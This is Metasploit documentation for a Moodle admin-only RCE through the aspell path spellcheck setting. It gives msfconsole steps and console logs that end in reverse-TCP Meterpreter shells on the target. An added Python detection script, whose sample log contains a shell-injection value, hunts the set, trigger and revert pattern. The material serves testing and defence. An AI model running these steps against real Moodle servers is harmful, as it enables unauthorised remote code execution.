metasploit-gs/documentation/modules/exploit/multi/http/moodle_spelling_path_rce.md
2023-10-10 14:46:18 -04:00

Vulnerable Application

Moodle allows an authenticated administrator to define spellcheck settings via the web interface. An administrator can update the aspell path so that it includes a command injection. This is extremely similar to CVE-2013-3630, only a different variable is used.

This module was tested against Moodle versions 3.11.2, 3.10.0, and 3.8.0. According to the Talos advisory (2021-04-21: vendor updated documentation to suggest best practices after installation), it is unclear whether Moodle will patch this. Therefore it is also unclear what the upper bound on exploitable versions is.
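The sequence the console output in the Scenarios below shows (update the aspell path, switch the engine to PSpellShell, trigger the payload, then remove the injection a few seconds later) is also the signal a defender can hunt for, because Moodle writes every admin-setting change to its config_log table. The Python below is an added example, not part of the module or of Moodle: the config_log rows are constructed sample data, aspellpath is Moodle's core setting name, and the spellengine setting name and the 300-second window are assumptions.

```python
import re
from collections import defaultdict

# Characters that have no place in a path to the aspell binary.
SHELL_META = re.compile(r"[;&|`$<>()\n]")

# "aspellpath" is Moodle's core setting for the aspell binary; the
# spell-engine setting name below is an assumption for this example.
PATH_SETTING = "aspellpath"
ENGINE_SETTING = "spellengine"

# Constructed rows in the shape of Moodle's config_log table
# (userid, timemodified, plugin, name, value, oldvalue); sample data only.
SAMPLE_LOG = [
    {"userid": 2, "timemodified": 1630245800, "plugin": None,
     "name": "sessiontimeout", "value": "7200", "oldvalue": "3600"},
    {"userid": 2, "timemodified": 1630245817, "plugin": None,
     "name": "aspellpath", "value": "/usr/bin/aspell; echo injected",
     "oldvalue": "/usr/bin/aspell"},
    {"userid": 2, "timemodified": 1630245817, "plugin": "editor_tinymce",
     "name": "spellengine", "value": "PSpellShell", "oldvalue": "PSpell"},
    {"userid": 2, "timemodified": 1630245823, "plugin": None,
     "name": "aspellpath", "value": "/usr/bin/aspell",
     "oldvalue": "/usr/bin/aspell; echo injected"},
]

def analyze_config_log(rows, revert_window=300):
    """Return (rule, timemodified, detail) findings for the set/trigger/revert pattern."""
    findings = []
    history = defaultdict(list)  # setting name -> earlier rows, oldest first
    for row in sorted(rows, key=lambda r: r["timemodified"]):
        name = row["name"]
        # Rule 1: shell metacharacters in the aspell path value.
        if name == PATH_SETTING and SHELL_META.search(row["value"] or ""):
            findings.append(("metachar_in_aspellpath", row["timemodified"], row["value"]))
        # Rule 2: a change undone within the window (the module's cleanup step).
        for earlier in history[name]:
            if (earlier["value"] == row["oldvalue"] and earlier["oldvalue"] == row["value"]
                    and row["timemodified"] - earlier["timemodified"] <= revert_window):
                findings.append(("rapid_revert", row["timemodified"], name))
                break
        history[name].append(row)
    # Rule 3: engine switched to PSpellShell close in time to an aspell path change.
    path_times = [r["timemodified"] for r in rows if r["name"] == PATH_SETTING]
    for row in rows:
        if (row["name"] == ENGINE_SETTING and row["value"] == "PSpellShell"
                and any(abs(row["timemodified"] - t) <= revert_window for t in path_times)):
            findings.append(("engine_switch_near_path_change", row["timemodified"], row["plugin"]))
    return findings
```

On a live site the same rules apply to rows read from mdl_config_log; the revert rule matters most, because after cleanup the current value of aspellpath looks clean again.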

Install

Moodle provides a step-by-step guide to installing their software here.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploits/multi/http/moodle_spelling_path_rce
  4. Do: set username [username]
  5. Do: set password [password]
  6. Do: run
  7. You should get a shell.

Options

Password

Password of an administrator.

Username

Username of an administrator. Defaults to admin.

Scenarios

Moodle 3.10.0 on Ubuntu 20.04

[*] Processing moodle_spellcheck.rb for ERB directives.
resource (moodle_spellcheck.rb)> use exploits/multi/http/moodle_spelling_path_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_spellcheck.rb)> set username admin
username => admin
resource (moodle_spellcheck.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_spellcheck.rb)> set targeturi /moodle-3.10.0/
targeturi => /moodle-3.10.0/
resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set proxies http:127.0.0.1:8080
proxies => http:127.0.0.1:8080
resource (moodle_spellcheck.rb)> set ReverseAllowProxy true
ReverseAllowProxy => true
resource (moodle_spellcheck.rb)> set lhost eth0
lhost => eth0
resource (moodle_spellcheck.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.10 detected
[*] Authenticating as user: admin
[*] Updating aspell path
[*] Changing spell engine to PSpellShell
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56124) at 2021-08-29 10:03:37 -0400
[*] Sleeping 5 seconds before cleanup
[*] Authenticating as user: admin
[*] Removing RCE from settings

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux

Moodle 3.11.2 on Ubuntu 20.04

resource (moodle_spellcheck.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (moodle_spellcheck.rb)> set username admin
username => admin
resource (moodle_spellcheck.rb)> set password Adminadmin1!
password => Adminadmin1!
resource (moodle_spellcheck.rb)> set targeturi /moodle-3.11.2/
targeturi => /moodle-3.11.2/
resource (moodle_spellcheck.rb)> set payload payload/php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
resource (moodle_spellcheck.rb)> set lhost eth0
lhost => eth0
resource (moodle_spellcheck.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 3.11.2 detected
[*] Authenticating as user: admin
[*] Updating aspell path
[*] Changing spell engine to PSpellShell
[*] Triggering payload
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:56130) at 2021-08-29 10:22:03 -0400
[*] Sleeping 5 seconds before cleanup
[*] Authenticating as user: admin
[*] Removing RCE from settings

meterpreter > sysinfo
Computer    : moodle
OS          : Linux moodle 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)